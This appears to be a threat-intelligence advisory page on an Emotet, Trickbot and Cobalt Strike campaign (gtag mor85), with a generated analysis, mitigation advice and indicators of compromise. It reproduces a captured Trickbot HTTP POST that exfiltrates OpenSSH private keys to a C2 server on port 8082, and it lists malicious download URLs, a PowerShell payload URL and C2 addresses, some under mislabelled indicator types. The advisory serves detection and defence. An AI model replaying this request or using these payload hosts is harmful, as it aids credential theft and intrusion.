Skip to main content

Emotet - Trickbot - CobaltStrike - gtag mor85

Low
Published: Wed Jan 29 2020 (01/29/2020, 00:00:00 UTC)
Source: CIRCL
Vendor/Project: emotet
Product: epoch

Description

``` POST /mor85/$HOSTNAME_W10017763.17B12C3CA6F6245FD0479319017B8DF1/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------XYYUIBBYFVTYXHJK User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E) Host: 203.176.135.102:8082 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------XYYUIBBYFVTYXHJK Content-Disposition: form-data; name="data" -----------XYYUIBBYFVTYXHJK Content-Disposition: form-data; name="source" OpenSSH private keys -----------XYYUIBBYFVTYXHJK-- ```

AI-Powered Analysis

AILast updated: 06/19/2025, 14:34:09 UTC

Technical Analysis

The threat titled "Emotet - Trickbot - CobaltStrike - gtag mor85" represents a multi-stage malware campaign involving the Emotet malware loader, Trickbot banking Trojan, and Cobalt Strike post-exploitation framework. Emotet acts as the initial infection vector, often delivered via malicious documents (maldocs) that download and execute payloads. Trickbot is then deployed as a secondary payload, providing modular capabilities such as credential theft, lateral movement, and network reconnaissance. Cobalt Strike, a legitimate penetration testing tool frequently abused by threat actors, is used here as a command and control (C2) framework to maintain persistence and control compromised hosts. Technical details reveal network activity involving HTTP POST requests to endpoints like "/mor85/$HOSTNAME.../81/" with multipart/form-data content, indicating data exfiltration attempts. Notably, Trickbot is observed exfiltrating OpenSSH private keys to a remote server on port 8082, which could enable attackers to gain unauthorized access to other systems via SSH. The User-Agent string mimics an outdated Internet Explorer browser to evade detection. Indicators include URLs hosting Emotet maldocs, Trickbot modules, and Cobalt Strike C2 servers, as well as IP addresses and domains associated with command and control infrastructure. No patches are available for this threat, and no known exploits in the wild are reported, suggesting it relies on social engineering and existing vulnerabilities for initial compromise. The threat is tagged with "payload delivery," "network activity," and "external analysis," highlighting its role in delivering and managing malicious payloads within victim networks. The overall threat level is rated low by the source, but the combination of Emotet, Trickbot, and Cobalt Strike components indicates a sophisticated attack chain capable of significant impact if successful.

Potential Impact

For European organizations, this threat poses risks primarily through credential theft, lateral movement, and potential data exfiltration. The exfiltration of OpenSSH private keys is particularly concerning for enterprises relying on SSH for secure remote access and administration, as compromised keys can lead to unauthorized access to critical infrastructure and internal systems. The presence of Cobalt Strike indicates potential for advanced persistent threat (APT)-style activities, including stealthy reconnaissance and privilege escalation. Financial institutions, government agencies, and critical infrastructure operators in Europe could face operational disruptions, data breaches, and reputational damage. The modular nature of Trickbot allows attackers to tailor payloads to specific targets, increasing the risk of targeted attacks. Although the threat is currently rated low severity, the ability to chain multiple malware families and tools increases the potential impact if defenses are inadequate. Organizations with weak email security, insufficient endpoint protection, or poor network segmentation are especially vulnerable.

Mitigation Recommendations

1. Implement advanced email filtering and sandboxing to detect and block Emotet maldocs and phishing attempts. 2. Enforce strict SSH key management policies, including regular key rotation, use of passphrases, and monitoring for unauthorized key usage. 3. Deploy network segmentation to limit lateral movement opportunities for Trickbot and Cobalt Strike payloads. 4. Monitor outbound network traffic for unusual HTTP POST requests, especially to suspicious domains or IPs on uncommon ports like 8082. 5. Utilize endpoint detection and response (EDR) solutions capable of identifying behaviors associated with Emotet, Trickbot, and Cobalt Strike. 6. Conduct regular threat hunting exercises focusing on indicators of compromise (IOCs) such as known C2 domains and IP addresses. 7. Educate employees on phishing risks and safe handling of email attachments. 8. Apply multi-factor authentication (MFA) for remote access systems to mitigate risks from stolen credentials or keys. 9. Maintain up-to-date backups and incident response plans to quickly recover from potential infections. 10. Collaborate with threat intelligence sharing communities to stay informed about emerging variants and tactics.

Need more detailed analysis?Get Pro

Technical Details

Threat Level
3
Analysis
0
Uuid
5e30d3b9-b330-44ac-8104-97af950d210f
Original Timestamp
1580472207

Indicators of Compromise

Url

ValueDescriptionCopy
urlhttp://1.magnoec.com/r2v5r/closed_CPo2hqV_9LuHqppjuXGHoSN/870323622452_ABzYhbO_portal/82h8i4qo61essf_4tu0x/
emotet maldoc download link
urlhttp://107.175.116.133/images/lastimg.png
Trickbot modules
urlhttp://107.175.116.133/images/mini.png
Trickbot modules
urlhttps://sophosdefence.com:80/agergbvafdsvgbrt
urlhttps://qwe4dse4.com/hcxUr9dg.ps1

File

ValueDescriptionCopy
file181.196.207.202
trickbot c2
file203.176.135.102
Trickbot Exfil On port 8082

Hash

ValueDescriptionCopy
hash449
trickbot c2
hash8082
Trickbot Exfil On port 8082

Text

ValueDescriptionCopy
text``` POST /mor85/$HOSTNAME_W10017763.17B12C3CA6F6245FD0479319017B8DF1/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------XYYUIBBYFVTYXHJK User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E) Host: 203.176.135.102:8082 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------XYYUIBBYFVTYXHJK Content-Disposition: form-data; name="data" -----------XYYUIBBYFVTYXHJK Content-Disposition: form-data; name="source" OpenSSH private keys -----------XYYUIBBYFVTYXHJK-- ```
Trickbot looking to exfil SSH keys
textCobalt Strike C2 delivered by trickbot

Link

ValueDescriptionCopy
linkhttps://laskowski-tech.com/2020/01/29/is-that-really-your-av-company-trickbot-gtag-mor85/
quick writeup

Ip

ValueDescriptionCopy
ip149.248.5.240
ip45.32.211.239

Domain

ValueDescriptionCopy
domainsophosdefence.com
domainqwe4dse4.com

Threat ID: 682c7af3e3e6de8ceb77d7c2

Added to database: 5/20/2025, 12:52:03 PM

Last enriched: 6/19/2025, 2:34:09 PM

Last updated: 7/27/2025, 5:09:07 PM

Views: 12

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

External Links

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats